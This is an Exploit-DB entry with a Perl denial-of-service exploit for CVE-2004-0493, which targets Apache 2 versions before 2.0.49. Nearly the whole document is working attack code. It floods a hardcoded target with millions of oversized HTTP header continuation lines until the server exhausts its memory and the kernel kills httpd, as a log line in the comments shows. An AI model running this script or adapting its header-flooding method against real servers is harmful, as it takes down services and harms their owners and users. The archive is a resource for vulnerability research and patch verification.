EXPLOITS

Apache - Arbitrary Long HTTP Headers (Denial of Service)

Author: bkbll
type: dos
platform: multiple
port: 80.0
date_added: 2004-07-21  
date_updated: 2016-03-28  
verified: 1  
codes: OSVDB-7269;CVE-2004-0493  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comhttpd-2.0.48.tar.gz  

raw file: 360.pl  

#/usr/bin/perl
#
#exploit for apache ap_get_mime_headers_core() vuln
#
#adv is here: http://www.guninski.com/httpd1.html
#
#version: apache 2 <2.0.49 apache 1 not tested.
#
#by bkbll bkbll#cnhonker.net http://www.cnhonker.com
#
#tail -f /var/log/messages
#Jul 1 17:43:16 www kernel: Out of Memory: Killed process 658 (httpd)
#

use IO::Socket::INET;

$host="10.10.10.114";
$port=80;
$sock = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port, Proto => 'tcp') || die "new error$@\n";
binmode($sock);
$hostname="Host: $host";
$buf2='A'x50;
$buf4='A'x8183;
$len=length($buf2);
$buf="GET / HTTP/1.1\r\n";
send($sock,$buf,0) || die "send error:$@\n";
for($i= 0; $i < 2000000; $i++)
{
    $buf=" $buf4\r\n";
    send($sock,$buf,0) || die "send error:$@, target maybe have been D.o.S?\n";
}
$buf="$hostname\r\n";
$buf.="Content-Length: $len\r\n";

$buf.="\r\n";
$buf.=$buf2."\r\n\r\n";

send($sock,$buf,0) || die "send error:$@\n";
print "Ok, our buffer have send to target \n";
close($sock);